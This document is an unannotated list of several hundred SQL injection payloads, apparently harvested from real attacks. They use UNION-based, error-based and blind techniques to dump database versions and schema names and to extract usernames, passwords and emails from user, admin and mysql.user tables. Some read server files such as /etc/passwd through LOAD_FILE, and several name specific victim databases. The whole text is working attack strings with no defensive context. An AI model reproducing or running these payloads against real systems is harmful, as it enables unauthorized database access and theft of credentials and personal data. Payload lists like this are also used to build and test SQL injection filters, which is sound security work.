1,concat_ws(0x3a3a,login,pass),3,4,5,6,7,8,9,10,11,12,13 from users -- -417 union select concat(version(),char(58,58),database(),char(58,58),user()),2,3,4,5,6,7,8/* -41839 union select 1,2,version(),database(),5,user(),7,8,9-- -41872' union select 1,2,3,concat_ws(0x3a,version(),user(),database()),5,6,7,8,9,10,11,12 -- 4187' union select 1,2,3,4,5,6,7,8,9,10,11,concat(username,0x3a,password,0x3a,email),13 from users limit 1,1/* 4187' union select 1,2,3,4,5,6,7,8,9,10,11,version(),13 from users limit 1,1/* -418 union select 1,2,3,concat_ws(0x2f,version(),user(),database()),5,6,7,8,9,10,11,12/* -418 union select 1,2,concat(username,0x20,password),4,5,6,7,8 from alumniadmin.users limit 1,1-- -418' union select 1,2,email,4,5,6,7,8,9,10,11,12,13,14,15,16 from user/* -4192 UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,concat_ws(0x3a,version(),database(),useR()),67,68,69,70 -4194 UnIon SeLeCT concat_ws(0x2b,version(),user(),@@version_compile_os),2,3,4,5 -- -4196 union select 1,2,3,4,5,concat_ws(0x3a,table_schema,table_name,column_name),7,8,9,10,11,12,13,14 from information_schema.columns limit 1098,1-- -4196 union select 1,2,3,4,5,group_concat(table_schema,0x3a,table_name),7,8,9,10,11,12,13,14 from information_schema.columns where column_name=0x6c6f67696e-- 41-999.9 union select 1,version(),3,4,5,6,7,8,9 -- 41-999.9 union select 1,version(),3,4,5,6,7,8,9,10,11,12 -- 41999 union select 1,2,3,4,5,6,version(),8,9,10-- -419 union select 1,2,3,4,5,6,concat_ws(0x3a,version(),user(),database()),8,9,10,11,12,13,14,15,16,17,18 -- 41 and 0 union select 1,2,version()-- -41 /*!and*/1=2 /*!union*/select/*!1,2,concat_ws(0x3a,database(),user(),version()),4,5,6,7,8*/ -- -41 union select 0,1,2,3,4 from members/* -41 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16 -- -41 union select 1,2,3,4,5,6,7,8,9,10,11 from news/* -41 union select 1,2,3,4,5,6,7,8,user(),10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28-- -41 union select 1,2,3,4,5,6,concat_ws(0x2a,version(),0x2a,database(),0x2a,user()),8 41 union select 1,2,3,4,5,column_name from information_schema.columns where table_name='phpbb_users'/* -41 union select 1,2,3,4,5,concat_ws(0x3a,version(),database(),user()),7,8,9,0,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35 -- 41 UnIon selECt 1,2,3,4,concat(Login,char(58),Haslo),6,7,8,9,10 from UZYTKOWNICY -- -41 union select 1,2,3,4,concat(password,0x3a,user),6,7,8 from mysql.user/ -41 union select 1,2,3,4,concat(password,0x3a,user),6,7,8 from mysql.user/* -41 union select 1,2,3,concat_ws(0x2F,version(),database(),user()),5,6,7,8,9/* -41 union select 1,2,3,concat_ws(0x3a,version(),database(),user()),5,6,7,8,9,10,11,12-- -41 UnIon selECt 1,2,3,group_concat(schema_name),5,6,7,8,9,10,11,12,13 from information_schema.schemata -- -41 union select 1,2,3,user(),5,6,7-- -41 union select 1,2,3,user(),version(),6/* -41 union select 1,2,concat_ws(0x3a3a,version(),user(),database(),@@version_compile_os),group_concat(0x0b,login,0x3a3a,password) from admin-- -41 union select 1,2,concat_ws(0x3a,@@version_compile_os,user(),version(),database()),4,5,6,7,8-- -41 union select 1,2,convert(concat(login,0x3A,passwd,0x3A,email),binary),4,5,6,7,8,9,10,11,12 from users limit 0,1-- -41 union select 1,2,date,version(),5,6,7,8 from news/* -41' union select 1,2,group_concat(login,0x3a,pass,0x3a,mail),4,5,6,7,8,9,10,11 from trfujitsudb.users-- -41 union select 1,2,null,group_concat(0x0b,username,0x3a3a,password,0x3a3a,salt,0x3a3a,email) from forum2_users-- -41' union select 1,2,table_name,4,5,6 from information_schema.tables/* -41 union select 1,2,user(),4,version(),6,7,8,9,10 -- -41 union select 1,2,version(),4,5,6,7,8,9,0,1,2,3,4/* -41 union select 1,concat(username,0x3a,user_password,0x3a,user_email,0x3a,user_icq),3,4,5,6 from phpbb_users limit 1,1/* -41 union select 1,concat_ws(0x3a3a,version(),user(),database()),3,4,5,6,7,8,9,10,11,12,13/* -41 union select 1,concat_ws(0x3a,login,password),3,4 from users limit 3,1/* -41 union select 1,concat_ws(0x3a,version(),user(),database()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17-- -41 union select 1,email,3,4,5,6,7,8,9,10,11,12,13,14,15 from subscriber/* -41 union select 1,version(),3,4,5 -- -41 union select 1,version(),user(),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20-- -41 union select 1,version(),user(),4,database(),6,7,8/* -41 union select concat(version(),0x2F,database(),0x2F,user()),2/* -41 UNION SELECT concat_ws(0x3a ,user(),database(),version()),2,3-- -41 union select concat_ws(0x3a,user(),database(),version()),2,3,4,5 -- -41 union select unhex(hex(id)),2,3,4 from users -- -41 union select unhex(hex(version())),2,3,4,5 -- -41 union select version(),user(),database(),4,5/* -4203 union select 1,2,convert(concat(userid,0x3a,pass,0x3a,nam,0x3a,fam,0x3a,tel), binary),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41 from users limit 0,1/* 42059 and 1=0 union Select group_concat(table_name) from information_Schema.tables where table_schema=0x62656b65736d6174726978-- 420 union select 1,2,3,4,5,6,7,8,9,10,11,concat_ws(0x3a,user(),database(),version()),13,14,15,16,17,18,19-- -420 union select 1,2,3,4,5,database(),7,8,9,10,11,12/* 420 union select 1,2,3,concat_ws(0x3a,user(),database(),version()),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19-- -420 union select 1,2,mail,id,5,6,7,8,9 from mail/* -420 union select concat_ws(0x2a3a2a,version(),database(),user(),@@version_compile_os),2,3,4,5,6,7,8,9,0,1,2,3,4-- -422 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14 from mysql.user /* -422 union select 1,2,3,4,5,6,7,8,concat_ws(0x3a,version(),user(),database()),10,11,12 -422 union select 1,AES_DECRYPT(AES_ENCRYPT(user(),0x71),0x71),3,4,5/* 4231' or 1 group by concat(concat_ws(0x3a3a,version(),@@version_compile_os,user(),database()),floor(rand(0)*2))having min(0) or 1 -- 423 union select 1,2,3,4,5,6,7,8,9,10 from release -423 union select 1,concat_ws(0x3a,database(),version(),user()),3,4,5,6,7,8,9,10,11,12-- -4241 union select 1,2,3,4,concat_ws(0x3a,user(),database(),version(),@@version_compile_os),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65-- -4244 GROUP BY A.id,A.title,pd,pt,A.lead,A.body,A.pic_alt,A.pic_capt,A.pic_l,SNS.name,SNA.name union select 1,2,user(),version(),5,database(),7,8,9,0,1,2,3/* -4249 UNION SELECT 0,concat_Ws(0x0b,user(),version(),database()),2,3,4,5,6,7,8,9 424 and 1=2 union select 1,2,3,4,5,6,7,concat_ws(CHAR(60,98,114,47,62),version(),database(),user()),9-- -4255 union select 1,2,3,4,concat_ws(0x203a20,table_name,column_name),6,7,8,9,10,11,12,13,14 from information_schema.columns/* -4256 UnIoN AlL sElEcT CONCAT_WS(CHAR(32,58,32),user(),database(),version())-- -425' union select 1,2,3,4,5,6,7,8,9,10,11,12,13,concat_ws(0x3a,user(),version(),database()),15,16 -- -42612 union select null,null,name||chr(58)||password||chr(58)||email from mboard_user limit 1 offset 0-- -4265 union select 1,2,3,4,5,6,7,TABLE_NAME,9,10,11 from information_schema.tables/* -426 union select 1,2,3,4,concat_ws(0x3a3a,lfdnr,Position,NName,VName,UName,PW,Access),6,7 from mitarbeiter limit 10,1 -- -426' union select 1,concat_ws(0x3A3a,id,type,user,password),3,4,5 from users/* -426 union select concat(version(),0x3a,0x3a,database(),0x3a,0x3a,user()),2,3,4,5 -- -42708' union select 1,2,3,4,5,6,7,8,9,10/* -42708 UNION select 1,2,passw,4,5,6,7,8,9,10 FROM chausers LIMIT 0,1/* 4274 UNION SELECT 1,2,3,4,5,6,7,concat_ws(0x3a,version(),user(),database())/* -427 UNION *ELECT 1,2,3,4,5,6,7,ver*ion(),databa*e(),u*er(),11,12,13,14,15 -4%27 union select 1,2,3,4,TABLE_NAME,6,user(),8,9,0 FROM INFORMATION_SCHEMA.TABLES/* -427 union select concat(user,0x3a,password),2,3 from mysql.user limit 1,1/* -4280 UNION SELECT 0,1,2,3,4,5,6,CONCAT_WS(0x0b,user(),database(),version()),8,9 -- -4283 union select 1,2,3,4,5,6,7,8,9,concat_ws(0x3a,0x3a,0x3a,username,0x3a,0x3a,password,0x3a,0x3a,anrede,0x3a,0x3a,realvname,0x3a,0x3a,realnname,0x3a,0x3a,land,0x3a,0x3a,ort,0x3a,0x3a,plz,0x3a,0x3a,strasse,0x3a,0x3a,email,0x3a,0x3a,gebdat,0x3a,0x3a,0x3a),11,12,13,14,15,16,17 from diplak.wuser_user-- 428900000 union select 1,2,3,4,5,6,concat(USER(),char(59),DATABASE(),char(59),VERSION()),8,9,10,11,12/* 428 AND 10)/* 43 and (select 1 from (select count(0),concat((select version()),floor(rand(0)*2)) from information_schema.tables group by 2)a)-- -43 union select 1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0-- -43' union select 1,2,3,4,5,6,7,8,9,0,1,2,3,4,concat_ws(0x3a,user(),version(),database()),6,7 from content/* -43 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,concat_ws(0x3a,user(),database(),version()),44,45,46,47/* -43 union select 1,2,3,4,5,6,7,group_concat(0x3a,table_name),9,10,11,12,13,14,15,16,17,18,19 from information_schema.tables-- 43 UNION SELECT 1,2,3,4,5,6,concat_ws(0x3a,user(),database(),version()),8,9,10,11,12,13,14,15,16,17,18,19 LIMIT 1,1-- -43 union select 1,2,3,4,5,6 from information_schema.tables -- -43 union select 1,2,3,4,5,concat_ws(0x3a,user_id,user_login,user_pass) from admin_users-- -43 union select 1,2,3,4,5,version()-- -43 union select 1,2,3,4,concat(table_schema,char(58),table_name),6,7,8,9,10,11 from information_schema.columns-- -43 union select 1,2,3,4,concat(username,0x3a,password),6,7 from admins/* -43 union select 1,2,3,4,group_concat(adminuser,char(58),adminpass),6,7,8,9,10,11 from adminsetting -- -43 union select 1,2,3,4,group_concat(login,0x3A,password SEPARATOR 0x0b),6,7,8,9 FROM mtg131_main.users-- -43 union select 1,2,3,concat_ws(0x3a,login,password),5,6,7,8,9 from users-- -43 union select 1,2,3,concat_ws(0x3a,username,password,admin),5,6 from users -43 union select 1,2,3,concat_ws(0x3a,user(),version(),database())/* 43 union select 1,2,3,pwd,5,6,7,8,9,10,11,12,13 from users/* -43 union select 1,2,concat_ws(0x3a,table_name),4,5,6,7 from information_schema.columns where column_name like 0x6c6f67696e/* -43 UNION SELECT 1,2,concat_ws(0x3a,version(),database(),user(),@@version_compile_os),4 -43 union select 1,2,database(),4,user(),6,7,8,9-- -43 union select 1,2,group_concat(table_name),4,5,6,7,8,9,10 from information_schema.tables -43 union select 1,2,version(),4,5,6,7,8 from users/* -43 UNION SELECT 1,CONCAT(0x7873716C696E6A626567696E,Version(),0x2F2A2A2F,Database(),0x2F2A2A2F,User(),0x7873716C696E6A656E64),3,4 -43 union select 1,password,3,4,5,6 from user/* -4-3' union select 1,unhex(hex(version())),3/* -43' union select 1,user(),3,4,5,6,7,8 -- -43 union select 1,version(),3,4-- -43 union select concat_ws(0x3a,version(),database(),user(),@@version_compile_os) -- -43 UNION SELECT null,VERSION(),null,null 43 UNION SELECT version(),2 limit 1,1/* -440 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21 -- -440 union select 1,concat(convert(version() using latin1),0x3a,0x3a,convert(user() using latin1),0x3a,0x3a,convert(database() using latin1)),3,4,5,6,7,8,9,10,11/* 440 union select 1,concat_ws(0x3a,user(),version(),database(),@@version_compile_os),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20 -- 440 union select 1,unhex(hex(group_concat(admin_username,0x3a,admin_password))),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20 from adh_admin -- 440 union select 1,unhex(hex(group_concat(email))),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20 from emails -- 44100000000 UNION SELECT 1,concat_ws(0x3a ,user(),database(),version()),3,4-- -4411 union select 1,2,3,4,5,6,LOAD_FILE(0x2F6574632F706173737764),8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65 -- -441 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26 -- -441 union select 1,2,version(),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37-- -442 union select 1,user(),3,4,5,6,7,8,9,10,11,12,13 from laufsport -- -442 union select 1,user(),3,database(),5,6,7/* -4431 union select 1,group_concat(email),3,4,5,6,7,8,9,10,11,12 from cpa_calendar.users -- 4434 UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18 LIMIT 1,1/* -443 and 1=2 union select 1,2,concat(@@version,0x20,user(),0x20,database(),0x20,@@version_compile_os),4,5,6,7,8,9,10,11 -- 443 and ascii(substring((select table_name from information_schema.tables limit 17,1),1,1))>1 -443' union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15 /* -444 union select 1,2,3,4,version()-- -444 union select 1,concat(user(),0x20,version(),0x20,database()),3,4,5,6,7,8,9,10,11 -444 union select 1,concat_ws(0x3a,admin_id,admin_name,admin_pwd),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29 from admin -4454 UNION SELECT 0,1,2,3,4,5,concat_ws(0x0b,user(),version(),database()),7,8 -- 445600000000 union select 1,2,3,4,concat(user,char(58),password) from mysql.user/* 445-999.9 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14-- 446388 union select 1,2,3,4,convert(version() using latin1),6,7,8,9 44645 and ascii(substring(version(),1,1))=53-- -4464 UNION SELECT 1,concat_ws(0x3a,version(),database(),user()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19/* 44691 UNION SELECT 1,pass,3,4,5,6,7,8,9,10,11 from users/* -446 union select concat_ws(0x3a,version(),user(),database()),2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0/* 447' or 447=(select top 1 table_name from information_schema.tables where table_name not in ('www_menusettings','dtproperties','postituslista_asetukset','postituslista_asiakkaat','postituslista_lahetykset','postituslista_ryhmat','postituslista_sivupohjat','sysconstraints','syssegment','syssegments','www_area','www_clientsettings','www_counter')) -- -447 UnIon selECt 1,concat_ws(0x3a,email,password),3,4,5,6,7,8,9,10,11,12,13,14,15 from users-- 4481 union select 1,concat_ws(0x3a3a,version(),user(),database()),3,4,5,6,7,8,9,10,null,null,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41/* -448601 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,concat_ws(0x3A, version(), user(), database()),16,17,18,19,20,21,22,23,24/* 448 union all select 1,2,3,4,5,6,7,8,concat_ws(0x3a,version(),database(),user()),10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83-- -448 union all select 1,2,3,4,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),6,7,8,9,10,11-- -448 union select 1,2,3,4,concat_ws(0x3a,user(),database(),version()),6,7,8,9,10,11,12,13,14,15,16-- 4495' union select 1,2,3,4,concat_ws(0x3a,version(),user(),database()),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21 -- -4495 union select 1,concat_ws(0x3a,version(),database(),user(),@@version_compile_os),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37-- 449 and 1=0 union select 1,2,concat(version(),0x3a,user(),0x3a,database()),4,5,6,7,8,9,10,11,12,13-- 44 and 1=0 union select 1,2,3,database(),version(),6-- 44 AND 1=2 UNION SELECT 0,1,2,3,null,5,6,7,8,9,10-- 44 AND ASCII(SUBSTRING((select user()),1,1))>80 44 union select 0,1,2,3/* 44 union select 0,concat(UserName,0x3a,PassWord),2,3,4,5,6,7,8,9,10,11 from DownUser -44 union select 11,22,concat(0x2020202020202020202020,user,0x3a,password),44 from mysql.user-- -44 union select 1,2,3,4,5,6,7 -- -44 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32-- -44 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,group_concat(table_name separator 0x3a),19,20,21,22 from information_schema.tables where table_schema=0x726964-- -44 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14 from hosting -- -44 union select 1,2,3,4,5,6,7,concat_ws(0x3a3a,username,password),9,10,11 from tbladmin-- -44 union select 1,2,3,4,5,6,7,concat_ws(0x3a,login,pwd),9,10,11,12,13,14 from users-- -44 union select 1,2,3,4,5,6,concat_ws(0x3a,user_name,user_loginname,user_password,user_email),8,9,10,11,12,13,14 from brigada_user -44 union select 1,2,3,4,5,6,concat_ws(0x3a,user_name,user_loginname,user_password,user_email,user_hideemail,user_join,user_ip,version()),8,9,10,11,12,13,14 from brigada_user -44 union select 1,2,3,4,5,6,concat_ws(0x3a,version(),database(),user()),8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23-- -44 union select 1,2,3,4,5,6,version(),8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23-- -44 unIon sELeCT 1,2,3,4,5,concat_ws(0x3a,user(),database(),version()) -- -44 union select 1,2,3,4,5 from admin/* -44 union select 1,2,3,4,concat_ws(0x0b,version(),user(),database(),@@version_compile_os),6,7,8,9-- 44 union select 1,2,3,4,version -44 union select 1,2,3,concat_ws(0x3a3a,login,pass) from users /* -44 UNION SELECT 1,2,3,concat_ws(0x3a,email,password),5 from users/* -44 union select 1,2,3,concat_ws(0x3a,user(),database(),version()),5,6,7,8,9,10-- -44 union select 1,2,3,convert((username) using latin1),convert((user_password) using latin1),6,7,8,9 from users-- -44' union select 1,2,3,table_name,5,6,7 from information_schema.tables where table_schema=0x7A39313031355F303031 limit 0,1-- -44' union select 1,2,concat_ws(0x3a,version(),database(),user(),@@version_compile_os),4,5,6,7,8-- -44 union select 1,2,group_concat(0x0b,name,0x3a,passw),4,5 from admin -44 union select 1,2,user(),concat(database(),0x3a,0x3a,version())/* -44 union select 1,concat(@i:=0x00,@o:=0x0d0a,benchmark(100,@o:=CONCAT(@o,0x0d0a,(SELECT concat(table_schema,0x2E,@i:=table_name) from information_schema.tables WHERE table_name>@i order by table_name LIMIT 1))),@o),3,4,5,6,7,8,9,0,1 -- -44 union select 1,concat(username,0x20,password),3,4,5,6,7,8,9,10,11,12 from members-- -44 union select 1,concat(username,char(58),password),3 from admins -44 UNION SELECT 1,CONCAT_WS(0x3A3a,version(),user(),database()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26/* -44 union select 1,concat_ws(0x3a,username,password),3,4,5,6,7,8,9,0,11,12,13,14,15,16,17,18,19,20,21,22,23 from atk_users-- -44 union select 1,database(),3,4,5,6,7,8,9 /* -44 union select 1,group_concat(login,char(58),pass),3,4,5,6,7,8 from user-- -44 union select 1,group_concat(table_name separator 0x3a),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24 from information_schema.tables where table_schema=0x6275646467726f757032 -- -44 union select 1,group_concat(username,0x3a,password),3,4,5,6,7,8,9,0,11 from user/* -44 union select concat_ws(0x3a,version(),user(),database()) -- -44 union select version()-- -4506 union select 1,2,3,aes_decrypt(aes_encrypt(concat(version(),0x3a,user(),0x3a,database(),0x71),0x71),0x71),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25/* 45084444 UNION SELECT 1,2,3,4,5,6,7,8,9,10,email,12 from subscribers/* 4509 and 1=0 union select 0,1,version(),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19 4509 and 1=0 union select 1,2,3,4,5,6,7,8,9,version(),11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39 -- 450 and 1=0 UnIon selECt 1,2,3,4,5,6,group_concat(table_name),8,9,10,11,12,13,14,15,16,17,18,19,20 from information_schema.tables where table_schema=database() -- -450 UNION SELECT 1,2,3,concat_ws(0x3a,version(),database(),user(),@@version_compile_os),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25-- 450 union select version(),2,3,4,5,6 limit 1,1/* -4512 union select 1,2,concat(user,0x3a,password,0x3a,host,0x3a,file_priv),4,5,6,7,8,9,10,11,12,13 from mysql.user limit 0,1-- -451 ' UNION SELECT 1,2,3,4,5,6,7,8,9,10,concat_ws(0x3a,version(),user(),database()),12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46 -- -451 union select 1,2,3,4,5,concat_ws(0x3a,database(),user(),version()),7,8,9,10,11,12,13,14,15,16,17,18,19,20 452-999.9 union select 1,2,3,4,5,6-- -452 union select 1,2,3,4,5,6,7,8,9,0,11,12,13,14,15,16,17,18,19 from u16011_2.admin-- -452 UNION SELECT 1,2,3,4,5,6,7,8,concat_ws(0x3a3a,version(),user(),@@version_compile_os),10,11,12,13,14 -- 453 union select 1,2,3,4,version(),6,7 /* -453 union select 1,unhex(hex(version())),3,4,5-- -453 union select concat_ws(0x3a,user(),database(),version()),2 -- -453 union select load_file(0x453A5C50726F6772616D2046696C65735C4170616368652047726F75705C417061636865325C6A6164755C7075626C69635F68746D6C5C736974655C696E636C756465735C666F6F7465722E706870),2,3,4/* -454 UNION SELECT 1,2,3,4,concat(email,char(58),password),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31 from account limit 2,3/* 45555 UNION SELECT 1,concat_ws(0x3a,version(),user(),database()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25/* -455 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15 from authors -- -455 union select 1,2,3,4,5,group_concat(username,char(58),password),7,8,9,10,11,12,13 from adr_admins-- -455 union select 1,2,3,4,concat_ws(0x3a3a,version(),user(),database()),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33 -- -4569 union select 1,2,concat_ws(0x3a,version(),database(),user(),@@version_compile_os),4,5 -456 union select concat_ws(0x3a,name,password) from _olomoucguide_admin_users-- 4573 union select 1,2,concat_ws(0x3a,table_name),4,5,6,7 from information_schema.tables limit 0,1-- -4577 union select 1,version(),3,4,5,6,7,8,9,10-- -457 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25 -- -457 union select 1,concat_ws(0x3a,version(),database(),user(),@@version_compile_os),3,4,5 4586 and 1=0 UnIon selECt 1,2,group_concat(,user(),version()),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45-- 458 and null union select 1,2,3,concat_ws(0x3a,user(),database(),version())-- -458 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31 from "table" 459888 union select concat(version(),0x3a,user(),0x3a,database()),2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18 459 and 1=2 union select 1,UNHEX(HEX(concat_ws(0x3a,user(),database(),version()))),3,4,5,6,7,8,9-- -459 union select 1,2,3,4,5,6,7,8 /* 459 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42 from mysql.user/* 459 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16 from msysaccessobjects 459 union select 1,2,3,4,5,6,7,8,9,10,11,12,concat(user,char(58),password),14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42 from mysql.user/* -459 UNION SELECT 1,2,3,password,email,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24 FROM users -- -459 union select 1,2,3,user(),version(),6,7,8,9,10,11,12,13,14,15,16,17-- 45 and 1=0 union select 1,2,3,4,concat_ws(0x3a,user(),version(),database(),@@version_compile_os),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24-- 45 and 1=0 UnIon selECt 1,2,group_concat(table_name),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25 from information_schema.tables where table_schema=0x73657465766f69 -- 45 and 1=0 union select 1,concat_ws(0x2f,user(),version(),database()),3-- 45 or 1 group by concat(concat_ws(0x3a3a,version(),user(),database(),@@version_compile_os),floor(rand(0)*2)) having min(0) or 1-- -45 ' union all select 1,concat(id_user,0x3a,login,0x3a,haslo,0x3a,mail),3,4 from users-- -45 union all select 1,concat_ws(0x3a,version(),user(),database()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24 -- 45' union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,email from user limit 1,1/* -45 union select 1,2,3,4,5,6,7,8,9,10,12,13,14,15,16-- -45 union select 1,2,3,4,5,6,7,8,9,concat_ws(0x3a,user(),version(),database()) -45 union select 1,2,3,4,5,6,7 from users/* -45 union select 1,2,3,4,concat_ws(0x3a,name,0x3a,login,0x3a,password),6,7,8 from wm_users-- -45 union select 1,2,3,4,concat_ws(0x3a,version(),database(),user()),6,7,8,9,10,11,12,13,14,15,16 -45 UNION SELECT 1,2,3,4,version(),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67/* 45/**/UNION/**/SELECT/**/1,2,3,concat(user,0x3a,password) from mysql.user limit 1,1/* -45 union select 1,2,3,concat_ws(0x3a,user,0x3a,password,0x3a,file_priv),5,6,7,8,9 from mysql.user 45 union select 1,2,3,concat_ws(0x3,version(),database(),user()),5,6,7 limit 1,1 45' union select 1,2,3,email,password,6 from users/* -45 union select 1,2,3 from admin -- 45 union select 1,2,3,LOAD_FILE(char(47,101,116,99,47,112,97,115,115,119,100)),5,6,database(),8,9,0,1,2,3,user(),5,6,7/* -45 union select 1,2,concat_ws(0x3a,user(),database(),version(),@@version_compile_os),4-- -45 union select 1,2,concat_ws(0x3a,version(),database(),user()),4,5,6,7,8,9-- -45 union select 1,2,pass,4,5,6,7,8,9,10,11,12 from ts_admin-- 45 UNION SELECT 1,AES_DECRYPT(AES_ENCRYPT(CONCAT(0x7873716C696E6A626567696E,Version(),0x2F2A2A2F,Database(),0x2F2A2A2F,User(),0x7873716C696E6A656E64),0x71),0x71),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17 LIMIT 1,1-- -45 union select 1,concat(file_priv,0x3a3a,User),3 from mysql.user limit 0,1-- -45 union select 1,concat_ws(0x3a,username,passwd,permis),3,4,5,3,7,8 from adms -- -45 union select 1,concat_ws(0x3a,version(),0x3a,user()),3,4-- -45 union select 1,group_concat(0x0b,column_name),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20 from information_schema.columns where table_name=0x70687062625f7573657273 -45 unIon select 1,(TaBLE_NAMe)fRoM(INFoRMaTION_ScHEMa.TAbLES)limit 29,1-- -45 union select concat(login,char(58),password),2 from users/* -45 union select concat_ws(0x3a,version(),database(),user()),2,3 -- 45 union select group_concat(0x0b,user_login,0x3a,user_pass,0x3a,user_email),2,3 from wp_users 4600 union select concat(person,0x3a,password),2 from innovate.person_account limit 25,1/* 460' and 1=0 union select 1,2,concat(name,0x3a,password),4 from users/* -46184' union select group_concat(database(),0x3a,user(),0x3a,version() separator 0x0b) -- 461 and 1=0 UNION SELECT 1,2,version() -- 461 and 1=0 UNION SELECT 1,version() -- -46236 union select 1,2,3,4,database(),6,7,8,9,10,11,12,13 from mysql.user -- 462 AND SUBSTRING((y()),1,1)=x-- -462 union select 1,2,3,4,concat_ws(0x3a,version(),user(),database()),6,7,8,9,10,11,12,13,14,15,16,17,18,19 -462 union select 1,2,concat(0x3a,version(),0x3a,user(),0x3a,database(),0x3a),4,5,6,7,8-- 4630 union select 1,table_name,3,4,5,6,7,8,9,0,1 from INFORMATION_SCHEMA.TABLESlimit 0,1/* 